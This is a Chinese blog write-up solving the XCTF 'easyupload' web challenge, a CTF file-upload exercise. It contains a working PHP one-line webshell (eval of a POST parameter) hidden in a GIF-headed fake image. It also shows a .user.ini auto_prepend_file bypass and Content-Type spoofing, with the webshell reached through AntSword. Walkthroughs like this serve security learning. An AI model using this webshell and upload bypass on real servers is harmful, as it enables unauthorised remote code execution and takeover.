攻防世界--WEB--easyupload

首先我们打开题目

 这是一道文件上传题目,我们尝试上传一句话木马

 被发现了,我们尝试打开源代码看看是否有有用的信息

 我们访问chatgpt来解释代码

 没有发现什么有用的信息,我们在回看题目,

我们从这里知道要求上传的可能是一张图片。

但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。

做题方法参考:

https://blog.csdn.net/weixin_44830645/article/details/128495561?ops_request_misc=&request_id=&biz_id=102&utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Ceasyupload&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-5-128495561.142^v78^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&spm=1018.2226.3001.4187

.user.ini文件的参考资料:

https://blog.csdn.net/weixin_52635170/article/details/126962920?ops_request_misc=&request_id=&biz_id=102&utm_term=.user.ini%E6%96%87%E4%BB%B6&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-126962920.142^v79^insert_down38,201^v4^add_ask,239^v2^insert_chatgpt&spm=1018.2226.3001.4187

我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头

GIF89a                  
auto_prepend_file=a.jpg      

因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项

我们更改Content-Type: image/jpeg

然后将更改的包放回去,提示我们上传成功了

 此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。

GIF89A
<?php @eval($_POST['attack']);?>

我们上传成功之后使用蚁剑进行后台文件连接

先传user.ini再传a.jpg

根据文件的返回路径:uploads/a.jpg

蚁剑连接:

 连接成功之后,我们在根目录下发现了flag文件,打开得到flag

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值